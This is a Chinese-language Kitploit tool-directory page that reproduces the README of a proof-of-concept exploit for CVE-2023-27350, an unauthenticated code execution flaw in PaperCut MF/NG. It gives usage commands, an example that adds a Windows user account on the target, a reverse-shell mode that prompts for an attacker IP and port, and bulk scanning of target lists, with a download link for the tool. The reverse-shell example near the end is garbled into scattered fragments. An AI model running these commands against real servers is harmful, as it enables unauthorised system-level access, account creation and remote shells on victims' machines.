Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-27350 — 针对 Papercut CVE-2023-27350 的利用程序。[+] 反向 shell [+] 批量检测 | Kitploit
工具/GitHubGitHub/adhikara13/cve-2023-27350
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

针对 Papercut CVE-2023-27350 的利用程序。[+] 反向 shell [+] 批量检测

查看仓库
9323年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-27350 漏洞利用概念验证

这是针对 CVE-2023-27350 的概念验证(POC)利用代码,该漏洞存在于 PaperCut MF/NG 中,允许未经身份验证的攻击者以 SYSTEM 权限执行任意代码。

环境要求

在使用此利用代码前,请确保已安装以下库:

root@kitploit:~
pip install -r requirements.txt

用法

root@kitploit:~
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

选项

  • -u, --url: 目标 PaperCut MF/NG 应用的 URL(例如 http://target-ip:9191)。
  • -c, --command: 要在目标系统上执行的命令。
  • --reverse-shell: 使用反弹 Shell 载荷在目标系统上执行命令。
  • -f, --file: 从文件中检查多个目标(例如 file.txt)。

示例

执行命令

要在目标系统上执行命令,使用 -c 选项:

root@kitploit:~
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

反弹 Shell

要使用反弹 Shell 载荷在目标系统上执行命令,使用 --reverse-shell 选项。系统将提示您输入 IP 地址和端口号:

root@kitploit:~
: : <> : <>

批量检查

要从文件中检查多个目标,使用 -f 选项。文件格式应为 ip_address:port:

root@kitploit:~
python CVE-2023-27350.py -f file.txt

格式化 file.txt

当使用批量检查选项时,请确保 file.txt 文件的内容格式正确。

文件的每一行应包含目标的 IP 地址和端口号,以冒号 : 分隔。例如:

root@kitploit:~
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080

确保 IP 地址、冒号和端口号之间没有多余的空格或字符。同时,确保每行只包含一个 IP 地址和端口号。

致谢

此版本源自 horizon3ai/CVE-2023-27350 仓库。原始漏洞利用代码的所有荣誉归原作者所有。

下载工具
python
exploit
.py
-u
http
//target-ip:9191 --reverse-shell
Enter
your
IP
address
attacker-ip
Enter
your
port
number
port